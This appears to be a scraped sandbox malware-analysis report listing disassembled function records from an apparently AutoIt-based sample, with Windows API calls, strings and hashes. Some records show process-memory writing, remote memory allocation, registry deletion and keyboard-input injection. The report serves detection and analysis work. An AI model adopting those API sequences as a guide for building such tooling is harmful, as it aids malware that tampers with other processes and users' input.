                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                            • API String ID: 1943609520-557222456
                                                                                                                            • Opcode ID: 93d7eee0023bc3af03fd4fdd11387b1dc5295d24b1a8930b1d504c58bf2390a0
                                                                                                                            • Instruction ID: e9b343709d8d11350258e7689b8d4c474d55edf7ba13cf49105dde0b801b6c8d
                                                                                                                            • Opcode Fuzzy Hash: 93d7eee0023bc3af03fd4fdd11387b1dc5295d24b1a8930b1d504c58bf2390a0
                                                                                                                            • Instruction Fuzzy Hash: 4791AB321082599FC714EF24D885C7EB7E8EF85310F10581DFA86AB2A2EB30ED44DB52
APIs
  • Part of subcall function 00EE4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE4743,?,?,00EE37AE,?), ref: 00EE4770
• CoInitialize.OLE32(00000000), ref: 00F4B9BB
• CoCreateInstance.OLE32(00F72D6C,00000000,00000001,00F72BDC,?), ref: 00F4B9D4
• CoUninitialize.OLE32 ref: 00F4B9F1
  • Part of subcall function 00EE9837: __itow.LIBCMT ref: 00EE9862
  • Part of subcall function 00EE9837: __swprintf.LIBCMT ref: 00EE98AC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
• String ID: .lnk
• API String ID: 2126378814-24824748
• Opcode ID: f6f41188e1cdba307809c5742ba909b5396c9aa613ee9deedd836c6c98ef5749
• Instruction ID: e6587f2e26b5102b042f4dc8c897228f2102859608df6c15f5a3b551e85ab822
• Opcode Fuzzy Hash: f6f41188e1cdba307809c5742ba909b5396c9aa613ee9deedd836c6c98ef5749
• Instruction Fuzzy Hash: A2A168756043459FCB04DF15C884D6ABBE5FF89324F148998F899AB3A2CB31EC45CB92
APIs
• __startOneArgErrorHandling.LIBCMT ref: 00F050AD
  • Part of subcall function 00F100F0: __87except.LIBCMT ref: 00F1012B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: ErrorHandling__87except__start
• String ID: pow
• API String ID: 2905807303-2276729525
• Opcode ID: 69055be2d0be65f33ecacd28fa061409ae207c0c6d853067bf219804cb852fc0
• Instruction ID: b8cdb9a91780db8fa061b9640aeb55cce5392164d1778405b08b7aea093d5581
• Opcode Fuzzy Hash: 69055be2d0be65f33ecacd28fa061409ae207c0c6d853067bf219804cb852fc0
• Instruction Fuzzy Hash: B3516A71E0C60696DB12B724CD013AF3BD49B41B20F208D59F4D5862E9EEF88DC4BE86
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: _memmove
• String ID: 3c$_
• API String ID: 4104443479-4099079164
• Opcode ID: 344c31a6a2cf97e11b07385a55a9dff4302fe7ad25c8adc8a8727c166c59e6d7
• Instruction ID: df6ace0a59e3bef7067bd212d1a12bbef2231ebfdcae34bf043575a4895d62c6
• Opcode Fuzzy Hash: 344c31a6a2cf97e11b07385a55a9dff4302fe7ad25c8adc8a8727c166c59e6d7
• Instruction Fuzzy Hash: FF516070E016199FCF24CF68D880AAEBBF1FF44354F248529E85AE7250EB30AD56DB51
APIs
  • Part of subcall function 00F414BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F39296,?,?,00000034,00000800,?,00000034), ref: 00F414E6
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F3983F
  • Part of subcall function 00F41487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F392C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00F414B1
  • Part of subcall function 00F413DE: GetWindowThreadProcessId.USER32(?,?), ref: 00F41409
  • Part of subcall function 00F413DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F3925A,00000034,?,?,00001004,00000000,00000000), ref: 00F41419
  • Part of subcall function 00F413DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F3925A,00000034,?,?,00001004,00000000,00000000), ref: 00F4142F
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F398AC
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F398F9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989
• Opcode ID: 5f4292fbab5ffc719511d6166647ad6bc21a31d74c6fe0a74af0ee1009ad1f75
• Instruction ID: 77cc31e47c3176073c057915606468da48992c1710c3262609bc8135cb768fd3
• Opcode Fuzzy Hash: 5f4292fbab5ffc719511d6166647ad6bc21a31d74c6fe0a74af0ee1009ad1f75
• Instruction Fuzzy Hash: 8F414176D0111CBFDB10DFA4CC81ADEBBB8EB45310F004199FA55B7191DAB16E85DBA0
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F6F910,00000000,?,?,?,?), ref: 00F679DF
• GetWindowLongW.USER32 ref: 00F679FC
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F67A0C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
• Opcode ID: e0f0bb1f8f9b6aff32f922210ea8aab4d1011d8099beeb4c95300dddcbfaa1c6
• Instruction ID: 8455ed8cd7a6f56df6f945d5c80eeaeb67f9bef6c13b1bddb3bde983fae10859
• Opcode Fuzzy Hash: e0f0bb1f8f9b6aff32f922210ea8aab4d1011d8099beeb4c95300dddcbfaa1c6
• Instruction Fuzzy Hash: 4B31DE3260420AABDB119E78DC41BEA77A9EB05338F244725F875A32E0D735ED50AB50
APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F67461
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F67475
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00F67499
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
• Opcode ID: 5be3a91086892a34f75e845c114181c6143b68781b309f3478451180c6f224ed
• Instruction ID: f4cd34a47a2e6458ae176c0c1056aee620e7048771310644a643d03673c5b66d
• Opcode Fuzzy Hash: 5be3a91086892a34f75e845c114181c6143b68781b309f3478451180c6f224ed
• Instruction Fuzzy Hash: 7921A132504218BBDF11DF64CC46FEA3B69EF48728F110214FE156B1D0DAB5AC95EBA0
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F67C4A
                                                                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F67C58
                                                                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F67C5F
                                                                                                                            Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32
• API String ID: 4014797782-2298589950
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F66D3B
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F66D4B
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F66D70
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F67772
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F67787
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F67794
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00EE4B83,?), ref: 00EE4C44
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00EE4C56
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-1355242751
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00EE4BD0,?,00EE4DEF,?,00FA52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00EE4C11
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00EE4C23
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-3689287502
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,00F61039), ref: 00F60DF5
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F60E07
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000001,00F58CF4,?,00F6F910), ref: 00F590EE
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F59100
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetModuleHandleExW$kernel32.dll
• API String ID: 2574300362-199464113
Similarity
• API ID: LocalTime__swprintf
• String ID: %.3d$WIN_XPe
• API String ID: 2070861257-2409531811
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• CharLowerBuffW.USER32(?,?), ref: 00F5E0BE
• CharLowerBuffW.USER32(?,?), ref: 00F5E101
  • Part of subcall function 00F5D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F5D7C5
• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00F5E301
• _memmove.LIBCMT ref: 00F5E314
Similarity
• API ID: BuffCharLower$AllocVirtual_memmove
• String ID:
• API String ID: 3659485706-0
APIs
• CoInitialize.OLE32(00000000), ref: 00F580C3
• CoUninitialize.OLE32 ref: 00F580CE
  • Part of subcall function 00F3D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F3D5D4
• VariantInit.OLEAUT32(?), ref: 00F580D9
• VariantClear.OLEAUT32(?), ref: 00F583AA
Similarity
• API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
• String ID:
• API String ID: 780911581-0
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00F72C7C,?), ref: 00F376EA
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00F72C7C,?), ref: 00F37702
• CLSIDFromProgID.OLE32(?,?,00000000,00F6FB80,000000FF,?,00000000,00000800,00000000,?,00F72C7C,?), ref: 00F37727
• _memcmp.LIBCMT ref: 00F37748
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
• API String ID: 314563124-0
APIs
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
APIs
• GetWindowRect.USER32(0120DB78,?), ref: 00F69863
• ScreenToClient.USER32(00000002,00000002), ref: 00F69896
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00F69903
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
APIs
• SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00F39AD2
• __itow.LIBCMT ref: 00F39B03
  • Part of subcall function 00F39D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00F39DBE
• SendMessageW.USER32(?,0000110A,00000001,?), ref: 00F39B6C
• __itow.LIBCMT ref: 00F39BC3
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00F569D1
• WSAGetLastError.WSOCK32(00000000), ref: 00F569E1
  • Part of subcall function 00EE9837: __itow.LIBCMT ref: 00EE9862
  • Part of subcall function 00EE9837: __swprintf.LIBCMT ref: 00EE98AC
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F56A45
• WSAGetLastError.WSOCK32(00000000), ref: 00F56A51
Similarity
• API ID: ErrorLast$__itow__swprintfsocket
• String ID:
• API String ID: 2214342067-0
APIs
• #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00F6F910), ref: 00F564A7
• _strlen.LIBCMT ref: 00F564D9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _strlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4218353326-0
                                                                                                                            • Opcode ID: 169dd6cfdccc9171bad5205aa271a802228a2795374260e7631671eb40dba270
                                                                                                                            • Instruction ID: a04fed7e1f2661d50915ded7794f71bd43f4ff10dbd5f1da971fdad232265e06
                                                                                                                            • Opcode Fuzzy Hash: 169dd6cfdccc9171bad5205aa271a802228a2795374260e7631671eb40dba270
                                                                                                                            • Instruction Fuzzy Hash: AF41E831900108AFCB14EB65EC85FAEB7F8AF14310F548165FE29E7292EB30AD04E750
                                                                                                                            APIs
                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F4B89E
                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 00F4B8C4
                                                                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F4B8E9
                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F4B915
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3321077145-0
                                                                                                                            • Opcode ID: 258f643fbd7ba05914fd91ef2fbdaf4b89f65e1de8cdcaccfaf39363eb8b02b7
                                                                                                                            • Instruction ID: 91f4f0455667de6236a4ba3c0ddf95457c8f1010f622a7f1dabe3fe88d223945
                                                                                                                            • Opcode Fuzzy Hash: 258f643fbd7ba05914fd91ef2fbdaf4b89f65e1de8cdcaccfaf39363eb8b02b7
                                                                                                                            • Instruction Fuzzy Hash: 2E412A39A00654DFCB14EF15C485A59BBE1EF8A320F098098ED4AAB362CB34FD01DB95
                                                                                                                            APIs
                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F688DE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InvalidateRect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 634782764-0
                                                                                                                            • Opcode ID: f405f554c68cde10d727aed4f24697b8093f84c360f90628b68e4c1a4ee253a3
                                                                                                                            • Instruction ID: 14e9fd4a6966045a9e4456a431e0a44488f3104bb5183ea5b31b2c204acdfc5f
                                                                                                                            • Opcode Fuzzy Hash: f405f554c68cde10d727aed4f24697b8093f84c360f90628b68e4c1a4ee253a3
                                                                                                                            • Instruction Fuzzy Hash: EF310630A40108AFEF209A28DC45FBC37A4EB067A0F54461AFA11E71E1CE70DD42B752
                                                                                                                            APIs
                                                                                                                            • ClientToScreen.USER32(?,?), ref: 00F6AB60
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00F6ABD6
                                                                                                                            • PtInRect.USER32(?,?,00F6C014), ref: 00F6ABE6
                                                                                                                            • MessageBeep.USER32(00000000), ref: 00F6AC57
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1352109105-0
                                                                                                                            • Opcode ID: afa88980d26d427df085e0e6be7cfbff426e1e911ff17b137ea96fda1852a30e
                                                                                                                            • Instruction ID: 477905446594544f034301d09f6c76634451c0a0ddc63a2d9477dc820d9bc4b7
                                                                                                                            • Opcode Fuzzy Hash: afa88980d26d427df085e0e6be7cfbff426e1e911ff17b137ea96fda1852a30e
                                                                                                                            • Instruction Fuzzy Hash: C7417C70A00219DFCB11DF58D884BA97BF5FF49720F1881A9E825AB365D730E841EF92
                                                                                                                            APIs
                                                                                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00F40B27
                                                                                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00F40B43
                                                                                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00F40BA9
                                                                                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00F40BFB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 432972143-0
                                                                                                                            • Opcode ID: 807f47c9d6d87591acb26c2073b52ba3510ec3315d17981b1b157a46cf4b5a06
                                                                                                                            • Instruction ID: b5c3463e28c3e00814fc1074d4bfcccd4cdf09d405b6cad217c1a09c8dcd5050
                                                                                                                            • Opcode Fuzzy Hash: 807f47c9d6d87591acb26c2073b52ba3510ec3315d17981b1b157a46cf4b5a06
                                                                                                                            • Instruction Fuzzy Hash: 6D310B30D44218AEFB308A658C05BF9BF65EBC5334F08425AEE91D21D1CBB94D45B759
                                                                                                                            APIs
                                                                                                                            • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00F40C66
                                                                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F40C82
                                                                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 00F40CE1
                                                                                                                            • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00F40D33
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 432972143-0
                                                                                                                            • Opcode ID: 9a1b24b69e33a4ce32ce7e7a732d261c2d448cdfc893ea37cb076871a6b67e2a
                                                                                                                            • Instruction ID: 75c3ecddb76ff5bfbe1e92b7722281d9027ea5042214c652d3148bf8807b9b1c
                                                                                                                            • Opcode Fuzzy Hash: 9a1b24b69e33a4ce32ce7e7a732d261c2d448cdfc893ea37cb076871a6b67e2a
                                                                                                                            • Instruction Fuzzy Hash: 7A310630E40218AEFB208B659C047BEBF75AB45334F08431AEA95621D1CB799D49B791
